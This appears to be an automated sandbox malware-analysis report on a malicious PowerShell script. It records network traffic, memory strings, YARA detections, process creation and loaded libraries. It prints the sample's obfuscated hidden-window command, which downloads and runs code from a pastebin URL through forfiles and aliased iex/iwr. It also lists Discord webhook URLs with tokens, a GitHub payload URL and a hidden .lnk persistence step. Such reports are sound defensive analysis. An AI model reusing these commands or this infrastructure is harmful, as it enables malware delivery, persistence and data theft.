Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 15:58:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729007918x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5rW2ejVkeP9d6fx5BgcD39XtRYbhZ13KlAeK4EP3cESF0Fee9RUk7FuTNVA3mGkjYwemcC1x%2FJyvOD0BcrV7UQ3U0uXXktV6qfbLRpLdciqVijT0oTT7xdKo2KP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=17847e3806a41616fa7f1cec02ab096d50e81535-1729007916; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=bhfVtuJAed2Y8F6zsSmHM7BsWdGa30oKEA6EcrLXXC0-1729007916984-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3102f8887ee70e-DFW
Source: powershell.exe, 00000007.00000002.1872751109.000001D4FB130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 0000000C.00000002.1869396878.000002019C5D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48133C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2mand
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000C.00000002.1871797306.000002019D273000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1652936620.000001F77E120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cox
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000000.00000002.1618712133.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019C7C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1618712133.000001F701D2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000000.00000002.1618712133.000001F701E68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, cr_asm_atCAD.ps1String found in binary or memory: https://discord.com/api/webhooks/1295751633158013021/9BlOhZ44xUrKpF4r8Of10VnlPL1j_-N82dLUs1Hltnp-q8J
Source: powershell.exe, 00000007.00000002.1800661112.000001D482079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019DC27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 00000007.00000002.1800661112.000001D481725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 0000000C.00000002.1871797306.000002019D30D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: powershell.exe, 00000007.00000002.1800661112.000001D48021F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1618712133.000001F7017B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D480E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019CE4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1644785909.000001F7101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1644785909.000001F71006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1855368210.000001D4901B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.1800661112.000001D48038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000007.00000002.1800661112.000001D4815F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48038D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4815FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48168D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D2A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000000.00000002.1618712133.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D48160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D481636000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1800661112.000001D4803BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D1F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1871797306.000002019D21C000.00000004.00000800.00020000.00000000.sdmp, cr_asm_atCAD.ps1String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_5180.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2716.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2944, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2716, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B06BB800_2_00007FFB4B06BB80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B06C8E20_2_00007FFB4B06C8E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4B04C7227_2_00007FFB4B04C722
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4B04B9767_2_00007FFB4B04B976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4B050EE97_2_00007FFB4B050EE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB4B050F207_2_00007FFB4B050F20
Source: amsi64_5180.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2716.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2944, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal84.troj.evad.winPS1@16/15@4/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igdi033w.a1d.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_atCAD.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
